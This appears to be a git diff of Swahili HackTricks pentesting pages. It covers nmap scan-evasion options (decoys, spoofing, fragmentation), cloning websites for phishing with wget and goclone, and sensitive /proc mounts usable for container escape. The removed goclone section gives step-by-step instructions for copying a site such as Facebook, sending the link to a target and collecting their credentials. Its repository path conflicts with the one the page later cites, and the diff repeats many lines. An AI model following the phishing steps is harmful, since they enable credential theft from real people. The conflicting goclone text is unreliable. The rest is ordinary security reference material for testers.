\-T0 --> Inachunguza bandari 1 kwa wakati mmoja na inangojea dakika 5 hadi inayofuata
|
||||
|
||||
\-T1 na T2 --> Zinafanana sana lakini zinasubiri 15 na 0.4 sekunde mtawaliwa kati ya kila jaribio
|
||||
\-T1 na T2 --> Sawa sana lakini zinangojea sekunde 15 na 0.4 kati ya kila jaribio mtawalia
|
||||
|
||||
\-T3 --> Kazi ya kawaida, pamoja na kuchunguza kwa wakati mmoja
|
||||
\-T3 --> Kazi ya msingi, inajumuisha kwa pamoja
|
||||
|
||||
\-T4 --> --max-rtt-timeout 1250ms --min-rtt-timeout 100ms --initial-rtt-timeout 500ms --max-retries 6 --max-scan-delay 10ms
|
||||
|
||||
\-T5 --> --max-rtt-timeout 300ms --min-rtt-timeout 50ms --initial-rtt-timeout 250ms --max-retries 2 --host-timeout 15m --max-scan-delay 5ms
|
||||
|
||||
Firewall/IDS
|
||||
**Firewall/IDS**
|
||||
|
||||
Huzuia kupitisha bandari na kuchambua pakiti.
|
||||
Huzuia kupita kwa bandari na kuchambua pakiti.
|
||||
|
||||
\-f --> Kugawanya pakiti, kwa chaguo-msingi inagawanya kwa 8bytes baada ya kichwa, ili kuweka ukubwa huo tunatumia ..mtu (hii inamaanisha kutotumia -f), offset lazima iwe mara mbili ya 8. **Skana za toleo na scripts hazisaidii kugawanya**
|
||||
**-f** Kugawanya pakiti, kwa msingi inagawa kwa 8bytes baada ya kichwa, kwa kubainisha ukubwa huo tunatumia ..mtu (kwa hili, usitumie -f), offset inapaswa kuwa maradufu ya 8. **Escaners ya toleo na scripts hazisaidii ugawanyaji**
|
||||
|
||||
\-D decoy1,decoy2,ME --> Nmap inatuma skana lakini na anwani za IP nyingine kama chanzo, hii inakuficha. Ikiwa unaweka ME kwenye orodha, nmap itakuweka hapo, ni bora kuweka 5 au 6 kabla yako ili kuficha kabisa. Anwani za IP zinaweza kuzalishwa kwa nasibu na RND:\<number> ili kuzalisha anwani za IP za kipekee. Hazifanyi kazi na uchunguzi wa toleo bila uhusiano wa TCP. Ikiwa uko ndani ya mtandao, ni bora kutumia anwani za IP ambazo zina shughuli, vinginevyo itakuwa rahisi kugundua kuwa wewe ndiye pekee aliye na shughuli.
|
||||
**-D decoy1,decoy2,ME** Nmap inatuma skana lakini kutoka kwa anwani za IP nyingine kama asili, hivyo kukuficha. Ikiwa unaweka ME kwenye orodha, nmap itakupa mahali hapo, ni bora kuweka 5 au 6 kabla yako ili kukuficha kabisa. Inaweza kuzalisha IPs za kubahatisha na RND:\<nambari> Ili kuzalisha IPs za kubahatisha. Hazifanyi kazi na detector ya toleo bila uhusiano wa TCP. Ikiwa uko ndani ya mtandao, ni bora kutumia IPs zilizo hai, vinginevyo itakuwa rahisi sana kugundua kuwa wewe ndiye pekee aliye hai.
|
||||
|
||||
Kutumia anwani za IP za kipekee: nmap -D RND:10 Ip\_lengo
|
||||
Kutumia IPs za kubahatisha: nmap-D RND: 10 Ip\_lengo
|
||||
|
||||
\-S IP --> Ikiwa Nmap haijapata anwani yako ya IP, unapaswa kuiweka hapa. Pia inafanya iweonekane kama kuna lengo lingine linal
|
||||
**--proxies** _**\<Orodha ya URL za wakala zilizotenganishwa kwa koma>**_ Ili kutumia wakala, mara nyingi wakala haishikilii idadi kubwa ya uhusiano kama vile nmap inavyotaka, kwa hivyo tunahitaji kurekebisha usambazaji: --max-parallelism
|
||||
**-S IP** Ikiwa Nmap haijapata anwani yako ya IP unapaswa kuipeana hivyo. Pia inafaa kufanya iweze kufikiri kuwa kuna lengo lingine linachunguza.
|
||||
|
||||
**-sP** Kugundua mwenyeji kwenye mtandao ambao tunatumia kupitia ARP
|
||||
**-e \<interface>** Kuchagua kiolesura
|
||||
|
||||
Wakati mwingine, watawala hujenga sheria kwenye firewall ambayo inaruhusu pakiti zote kutoka kwenye bandari fulani (kama 20, 53, na 67), tunaweza kuambia nmap kutuma pakiti zetu kutoka kwenye bandari hizo: **nmap --source-port 53 Ip**
|
||||
Waadiministrata wengi huacha bandari za kuingia wazi ili kila kitu kiweze kufanya kazi vizuri na ni rahisi kwao kuliko kutafuta suluhisho lingine. Hizi zinaweza kuwa bandari za DNS au FTP... kwa kutafuta udhaifu huu nmap inajumuisha: **--source-port** _**\<nambari ya bandari>**_**;-g** _**\<nambari ya bandari>**_ _Zinafaana_
|
||||
|
||||
**--data** _**\<hex string>**_ Kutuma maandishi ya hexadecimal: --data 0xdeadbeef na --data \xCA\xFE\x09
|
||||
|
||||
**--data-string** _**\<string>**_ Kutuma maandishi ya kawaida: --data-string "Uchunguzi uliofanywa na Operesheni ya Usalama, upanuzi 7192"
|
||||
|
||||
**--data-length** _**\<nambari>**_ Nmap inatuma vichwa pekee, hivyo tunaweza kuongeza idadi ya baits (ambayo itazalishwa kwa kubahatisha)
|
||||
|
||||
Kuweka pakiti ya IP kikamilifu kutumia **--ip-options**
|
||||
|
||||
Ikiwa unataka kuona chaguo katika pakiti zinazotumwa na kupokelewa, eleza --packet-trace. Kwa habari zaidi na mifano ya kutumia chaguo za IP na Nmap, angalia [http://seclists.org/nmap-dev/2006/q3/52](http://seclists.org/nmap-dev/2006/q3/52).
|
||||
|
||||
**--ttl** _**\<thamani>**_
|
||||
|
||||
**--randomize-hosts** Ili shambulio liwe lisilo dhahiri
|
||||
|
||||
**--spoof-mac** _**\<anwani ya MAC, kiambishi, au jina la muuzaji>**_ Kubadilisha MAC mfano: Apple, 0, 01:02:03:04:05:06, deadbeefcafe, 0020F2, na Cisco
|
||||
**--proxies** _**\<Orodha ya URL za proxy zilizotenganishwa na koma>**_ Ili kutumia proxies, mara nyingi proxy haishikilii idadi kubwa ya uhusiano kama nmap inavyotaka, hivyo inaweza kuhitaji kurekebisha upatanishi: --max-parallelism
|
||||
|
||||
**-sP** Kugundua mwenyeji kwenye mtandao tunaoendesha kupitia ARP
|
||||
|
||||
Wakati mwingine, watawala wa mfumo huanzisha sheria kwenye firewall inayoruhusu pakiti zote zinazotoka kwenye bandari fulani (kama 20, 53, na 67) kupita, tunaweza kuagiza nmap kutuma pakiti zetu kutoka bandari hizo: **nmap --source-port 53 Ip**
|
||||
|
||||
**Matokeo**
|
||||
|
||||
|
@ -156,47 +196,47 @@ Wakati mwingine, watawala hujenga sheria kwenye firewall ambayo inaruhusu pakiti
|
|||
|
||||
**-oS faili** Matokeo ya script kidies
|
||||
|
||||
**-oG faili** Matokeo yanayoweza kutafutwa
|
||||
**-oG faili** Matokeo yanayoweza kutafutika
|
||||
|
||||
**-oA faili** Yote isipokuwa -oS
|
||||
|
||||
**-v kiwango** uwazi
|
||||
**-v kiwango** maelezo
|
||||
|
||||
**-d kiwango** uchunguzi
|
||||
**-d kiwango** kurekebisha hitilafu
|
||||
|
||||
**--reason** Sababu ya mwenyeji na hali
|
||||
|
||||
**--stats-every wakati** Inatuambia jinsi inavyokwenda kila wakati fulani
|
||||
**--stats-every muda** Kila baada ya muda huo inatuambia jinsi mambo yanavyokwenda
|
||||
|
||||
**--packet-trace** Kuona pakiti zinazotoka, tunaweza kutoa vigezo vya kuchuja kama: --version-trace au --script-trace
|
||||
**--packet-trace** Kuona ni pakiti zipi zinazotumwa, unaweza kutoa maelezo maalum kama: --version-trace au --script-trace
|
||||
|
||||
**--open** inaonyesha wazi, wazi|imefungwa, na zisizofungwa
|
||||
**--open** inaonyesha wazi, wazi|zilizofutwa, na zisizofutwa
|
||||
|
||||
**--resume faili** Inatoa muhtasari
|
||||
|
||||
**Miscelanea**
|
||||
**Mchanganyiko**
|
||||
|
||||
**-6** Inaruhusu ipv6
|
||||
|
||||
**-A** Ni sawa na -O -sV -sC --traceroute
|
||||
|
||||
**Wakati wa kukimbia**
|
||||
**Muda wa Kutekeleza**
|
||||
|
||||
Wakati nmap inakimbia, tunaweza kubadilisha chaguo:
|
||||
|
||||
v / V Ongeza / punguza kiwango cha uwazi
|
||||
v / V Ongeza / punguza kiwango cha maelezo
|
||||
|
||||
d / D Ongeza / punguza kiwango cha uchunguzi
|
||||
d / D Ongeza / punguza kiwango cha kurekebisha
|
||||
|
||||
p / P Ongeza / zima ufuatiliaji wa pakiti
|
||||
p / P Weka / toa ufuatiliaji wa pakiti
|
||||
|
||||
? Chapisha skrini ya msaada wa mwingiliano wa wakati wa kukimbia
|
||||
? Chapisha skrini ya msaada wa mwingiliano wa wakati wa kutekeleza
|
||||
|
||||
**Vulscan**
|
||||
|
||||
Script ya nmap inayotazama toleo la huduma zilizopatikana kwenye database ya nje ya mtandao (ambayo inapakua kutoka kwa zingine muhimu sana) na inarudisha udhaifu unaowezekana
|
||||
Script ya nmap inayotazama toleo la huduma zilizopatikana kwenye hifadhidata ya nje ya mtandao (ambayo inapakuliwa kutoka kwa zingine muhimu sana) na kurudisha mapungufu yanayowezekana
|
||||
|
||||
Databases inayotumia ni:
|
||||
Hifadhidata zinazotumiwa ni:
|
||||
|
||||
1. Scipvuldb.csv | [http://www.scip.ch/en/?vuldb](http://www.scip.ch/en/?vuldb)
|
||||
2. Cve.csv | [http://cve.mitre.org](http://cve.mitre.org/)
|
||||
|
@ -207,36 +247,40 @@ Databases inayotumia ni:
|
|||
7. Exploitdb.csv | [http://www.exploit-db.com](http://www.exploit-db.com/)
|
||||
8. Openvas.csv | [http://www.openvas.org](http://www.openvas.org/)
|
||||
|
||||
Ili kupakua na kusakinisha kwenye saraka ya Nmap:
|
||||
Ili kuipakua na kuweka kwenye folda ya Nmap:
|
||||
|
||||
wget http://www.computec.ch/projekte/vulscan/download/nmap\_nse\_vulscan-2.0.tar.gz && tar -czvf nmap\_nse\_vulscan-2.0.tar.gz vulscan/ && sudo cp -r vulscan/ /usr/share/nmap/scripts/
|
||||
|
||||
Pia tunahitaji kupakua pakiti za databases na kuziweka kwenye /usr/share/nmap/scripts/vulscan/
|
||||
Pia unahitaji kupakua pakiti za hifadhidata na kuziweka kwenye /usr/share/nmap/scripts/vulscan/
|
||||
|
||||
Matumizi:
|
||||
|
||||
Kutumia zote: sudo nmap -sV --script=vulscan HOST\_A\_ESCANEAR
|
||||
|
||||
Kutumia database maalum: sudo nmap -sV --script=vulscan --script-args vulscandb=cve.csv HOST\_A\_ESCANEAR
|
||||
Kutumia hifadhidata maalum: sudo nmap -sV --script=vulscan --script-args vulscandb=cve.csv HOST\_A\_ESCANEAR
|
||||
|
||||
## Kuharakisha Uchunguzi wa Huduma za Nmap x16
|
||||
|
||||
Kulingana na [**chapisho hili**](https://joshua.hu/nmap-speedup-service-scanning-16x), unaweza kuharakisha uchambuzi wa huduma za nmap kwa kubadilisha thamani zote za **`totalwaitms`** katika **`/usr/share/nmap/nmap-service-probes`** kuwa **300** na **`tcpwrappedms`** kuwa **200**.
|
||||
Kulingana na [**chapisho hili**](https://joshua.hu/nmap-speedup-service-scanning-16x) unaweza kuharakisha uchambuzi wa huduma za nmap kwa kurekebisha thamani zote za **`totalwaitms`** katika **`/usr/share/nmap/nmap-service-probes`** kuwa **300** na **`tcpwrappedms`** kuwa **200**.
|
||||
|
||||
Zaidi ya hayo, vipimo ambavyo havina **`servicewaitms`** maalum hutumia thamani ya msingi ya **`5000`**. Kwa hivyo, tunaweza kuongeza thamani kwa kila kipimo, au tunaweza **kukusanya nmap** wenyewe na kubadilisha thamani ya msingi katika [**service\_scan.h**](https://github.com/nmap/nmap/blob/master/service\_scan.h#L79).
|
||||
Zaidi ya hayo, uchunguzi ambao haujapewa thamani maalum ya **`servicewaitms`** hutumia thamani ya msingi ya **`5000`**. Kwa hivyo, tunaweza kuongeza thamani kwa kila uchunguzi, au tunaweza **kukusanya upya nmap** na kubadilisha thamani ya msingi katika [**service\_scan.h**](https://github.com/nmap/nmap/blob/master/service\_scan.h#L79).
|
||||
|
||||
Ikiwa hautaki kubadilisha thamani za **`totalwaitms`** na **`tcpwrappedms`** kabisa katika faili ya `/usr/share/nmap/nmap-service-probes`, unaweza kuhariri [msimbo wa kuchambua](https://github.com/nmap/nmap/blob/master/service\_scan.cc#L1358) ili thamani hizi katika faili ya `nmap-service-probes` zisipuuzwe kabisa.
|
||||
Ikiwa hutaki kubadilisha thamani za **`totalwaitms`** na **`tcpwrappedms`** kabisa kwenye faili ya `/usr/share/nmap/nmap-service-probes`, unaweza kuhariri [msimbo wa kuchambua](https://github.com/nmap/nmap/blob/master/service\_scan.cc#L1358) ili thamani hizi kwenye faili ya `nmap-service-probes` zisipuuzwe kabisa.
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi mtaalamu na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -4,90 +4,54 @@
|
|||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Kwa tathmini ya phishing mara nyingine inaweza kuwa na manufaa kuiga kabisa **tovuti**.
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
Kumbuka kuwa unaweza pia kuongeza baadhi ya mzigo kwenye tovuti iliyoigwa kama kitanzi cha BeEF ili "kudhibiti" kichupo cha mtumiaji.
|
||||
|
||||
Kuna zana tofauti unazoweza kutumia kwa kusudi hili:
|
||||
|
||||
Kwa tathmini ya udukuzi wa kimakosa mara kwa mara inaweza kuwa muhimu kuchukua kabisa **nakala ya tovuti**.
|
||||
|
||||
Tambua kwamba unaweza pia kuongeza baadhi ya mzigo kwenye tovuti iliyonakiliwa kama kitanzi cha BeEF ili "kudhibiti" kichupo cha mtumiaji.
|
||||
|
||||
Kuna zana tofauti unazoweza kutumia kwa lengo hili:
|
||||
|
||||
## wget
|
||||
```text
|
||||
wget -mk -nH
|
||||
```
|
||||
## goclone
|
||||
|
||||
Goclone ni chombo cha barua pepe kinachotumiwa kwa kuchukua tovuti halisi na kuunda nakala yake ili kuunda tovuti bandia. Chombo hiki kinaweza kutumiwa kwa njia mbaya kwa kutekeleza mbinu ya ulaghai inayojulikana kama "phishing".
|
||||
|
||||
Kwa kuanza, unahitaji kufunga Goclone kwenye mfumo wako. Unaweza kufanya hivyo kwa kufuata hatua zifuatazo:
|
||||
|
||||
1. Pakua Goclone kutoka kwenye chanzo chake rasmi au kutumia amri ifuatayo ya Terminal:
|
||||
|
||||
```
|
||||
go get github.com/RedTeamPentesting/goclone
|
||||
```
|
||||
|
||||
2. Baada ya kufunga Goclone, unaweza kuitumia kwa kufuata amri ifuatayo ya Terminal:
|
||||
|
||||
```
|
||||
goclone -u <URL ya tovuti ya asili> -o <jina la folda ya tovuti bandia>
|
||||
```
|
||||
|
||||
Kwa mfano, ikiwa unataka kuiga tovuti ya Facebook, unaweza kutumia amri ifuatayo:
|
||||
|
||||
```
|
||||
goclone -u https://www.facebook.com -o facebook-clone
|
||||
```
|
||||
|
||||
Hii itasababisha Goclone kuiga tovuti ya Facebook na kuunda nakala yake kwenye folda iliyopewa jina "facebook-clone".
|
||||
|
||||
Baada ya kuiga tovuti, unaweza kuitumia kwa njia mbaya kwa kutekeleza shambulio la ulaghai. Ni muhimu kukumbuka kuwa matumizi mabaya ya Goclone ni kinyume cha sheria na inaweza kusababisha mashtaka ya kisheria. Ni muhimu kuzingatia sheria na kufanya matumizi sahihi ya zana hii.
|
||||
```bash
|
||||
#https://github.com/imthaghost/goclone
|
||||
goclone <url>
|
||||
```
|
||||
## Zana za Uhandisi wa Jamii
|
||||
|
||||
### Kigezo cha Kujifanya
|
||||
|
||||
Kigezo cha kujifanya ni zana muhimu katika uhandisi wa kijamii. Inaruhusu mtumiaji kuiga tovuti halisi na kuunda nakala yake. Hii ni njia ya kawaida ya kutekeleza mashambulizi ya kudanganya na kuiba habari za siri kutoka kwa watumiaji wasio na ufahamu.
|
||||
|
||||
#### Hatua za Kujifanya Tovuti
|
||||
|
||||
1. Chagua tovuti ya kulenga: Chagua tovuti ambayo ungependa kuiga. Inashauriwa kuchagua tovuti maarufu ambayo inavutia idadi kubwa ya watumiaji.
|
||||
|
||||
2. Pakua kigezo cha tovuti: Tafuta kigezo cha tovuti kinachofanana na tovuti unayotaka kuiga. Kuna vyanzo vingi vya kigezo cha tovuti vinavyopatikana mkondoni.
|
||||
|
||||
3. Fanya mabadiliko kwenye kigezo: Baada ya kupakua kigezo cha tovuti, fanya mabadiliko kulingana na mahitaji yako. Unaweza kubadilisha picha, maandishi, na viungo ili kuifanya iwe sawa na tovuti halisi.
|
||||
|
||||
4. Weka kigezo kwenye seva: Baada ya kufanya mabadiliko yote, weka kigezo kwenye seva yako ili iweze kupatikana mkondoni.
|
||||
|
||||
5. Tuma kiunga kwa lengo lako: Sasa unaweza kutuma kiunga cha kigezo chako kwa lengo lako. Unaweza kutumia njia mbalimbali kama barua pepe, ujumbe wa maandishi, au mitandao ya kijamii.
|
||||
|
||||
6. Shughulikia habari zilizopatikana: Mara tu lengo lako linapofungua kiunga na kuingia habari zao za siri, habari hizo zitatumwa kwako. Unaweza kuzitumia kwa madhumuni yako ya kudanganya au kuiba habari.
|
||||
|
||||
Kumbuka: Kujifanya tovuti ni shughuli haramu na inaweza kusababisha mashtaka ya kisheria. Tumia maarifa haya kwa uwajibikaji na kwa madhumuni ya kujifunza tu.
|
||||
## Zana ya Uhandisi wa Kijamii
|
||||
```bash
|
||||
#https://github.com/trustedsec/social-engineer-toolkit
|
||||
```
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka mwanzo hadi mtaalamu na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka mwanzo hadi mtaalamu na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalamu wa Timu Nyekundu ya HackTricks AWS)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
|
@ -14,7 +14,11 @@ Njia nyingine za kusaidia HackTricks:
|
|||
|
||||
</details>
|
||||
|
||||
Kufichua `/proc` na `/sys` bila kujitenga kwa njia sahihi ya namespace kunaweza kuleta hatari kubwa za usalama, ikiwa ni pamoja na kuongezeka kwa eneo la mashambulizi na kufichua habari. Direktori hizi zina faili nyeti ambazo, ikiwa hazijasakinishwa vizuri au kupatikana na mtumiaji asiyeidhinishwa, zinaweza kusababisha kutoroka kwa kontena, mabadiliko kwenye mwenyeji, au kutoa habari itakayosaidia mashambulizi zaidi. Kwa mfano, kusakinisha kimakosa `-v /proc:/host/proc` kunaweza kukiuka ulinzi wa AppArmor kutokana na asili yake ya njia, kuacha `/host/proc` bila ulinzi.
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
Kufichua `/proc` na `/sys` bila kujitenga kwa njia sahihi ya namespace inaleta hatari kubwa za usalama, ikiwa ni pamoja na kuongezeka kwa eneo la mashambulizi na kufichua habari. Direktori hizi zina faili nyeti ambazo, ikiwa hazijasakinishwa vizuri au kupatikana na mtumiaji asiyeidhinishwa, zinaweza kusababisha kutoroka kwa kontena, mabadiliko kwenye mwenyeji, au kutoa habari itakayosaidia mashambulizi zaidi. Kwa mfano, kusakinisha kimakosa `-v /proc:/host/proc` kunaweza kukiuka ulinzi wa AppArmor kutokana na asili yake ya msingi wa njia, kuacha `/host/proc` bila ulinzi.
|
||||
|
||||
**Unaweza kupata maelezo zaidi ya kila vuln inayowezekana katika** [**https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts**](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts)**.**
|
||||
|
||||
|
@ -27,7 +31,7 @@ Direktori hii inaruhusu upatikanaji wa kubadilisha vipimo vya kernel, kawaida ku
|
|||
#### **`/proc/sys/kernel/core_pattern`**
|
||||
|
||||
* Imeelezewa katika [core(5)](https://man7.org/linux/man-pages/man5/core.5.html).
|
||||
* Inaruhusu kufafanua programu ya kutekelezwa wakati wa kuzalisha faili ya msingi na herufi 128 za kwanza kama hoja. Hii inaweza kusababisha utekelezaji wa nambari ikiwa faili inaanza na mabomba `|`.
|
||||
* Inaruhusu kufafanua programu ya kutekelezwa wakati wa kuzalisha faili ya msingi na herufi 128 za kwanza kama hoja. Hii inaweza kusababisha utekelezaji wa nambari ikiwa faili inaanza na mrija `|`.
|
||||
* **Mfano wa Majaribio na Uvamizi**:
|
||||
|
||||
```bash
|
||||
|
@ -50,7 +54,7 @@ ls -l $(cat /proc/sys/kernel/modprobe) # Angalia upatikanaji wa modprobe
|
|||
#### **`/proc/sys/vm/panic_on_oom`**
|
||||
|
||||
* Inatajwa katika [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html).
|
||||
* Bendera ya ulimwengu inayodhibiti ikiwa kernel inapaniki au inaita OOM killer wakati hali ya OOM inatokea.
|
||||
* Bendera ya ulimwengu inayodhibiti ikiwa kernel inapata kosa la kumbukumbu au inaita OOM killer wakati hali ya OOM inatokea.
|
||||
|
||||
#### **`/proc/sys/fs`**
|
||||
|
||||
|
@ -59,10 +63,10 @@ ls -l $(cat /proc/sys/kernel/modprobe) # Angalia upatikanaji wa modprobe
|
|||
|
||||
#### **`/proc/sys/fs/binfmt_misc`**
|
||||
|
||||
* Inaruhusu usajili wa wachambuzi kwa muundo wa binary usio wa asili kulingana na nambari zao za uchawi.
|
||||
* Inaruhusu kusajili wachambuzi kwa muundo wa binary usio wa asili kulingana na nambari zao za uchawi.
|
||||
* Inaweza kusababisha upandishaji wa kiwango cha ruhusa au ufikiaji wa kabati ya mizizi ikiwa `/proc/sys/fs/binfmt_misc/register` inaweza kuandikwa.
|
||||
* Uvamizi na maelezo yanayofaa:
|
||||
* [Rootkit ya mtu masikini kupitia binfmt\_misc](https://github.com/toffan/binfmt\_misc)
|
||||
* [Rootkit ya maskini kupitia binfmt\_misc](https://github.com/toffan/binfmt\_misc)
|
||||
* Mafunzo ya kina: [Kiungo cha Video](https://www.youtube.com/watch?v=WBC7hhgMvQQ)
|
||||
|
||||
### Nyingine katika `/proc`
|
||||
|
@ -74,47 +78,47 @@ ls -l $(cat /proc/sys/kernel/modprobe) # Angalia upatikanaji wa modprobe
|
|||
|
||||
#### **`/proc/sysrq-trigger`**
|
||||
|
||||
* Inaruhusu kuita amri za Sysrq, ikisababisha uanzishaji wa haraka wa mfumo au hatua nyingine muhimu.
|
||||
* **Mfano wa Kuwasha Upya Mwenyeji**:
|
||||
* Inaruhusu kuita amri za Sysrq, ikisababisha upya wa haraka wa mfumo au hatua nyingine muhimu.
|
||||
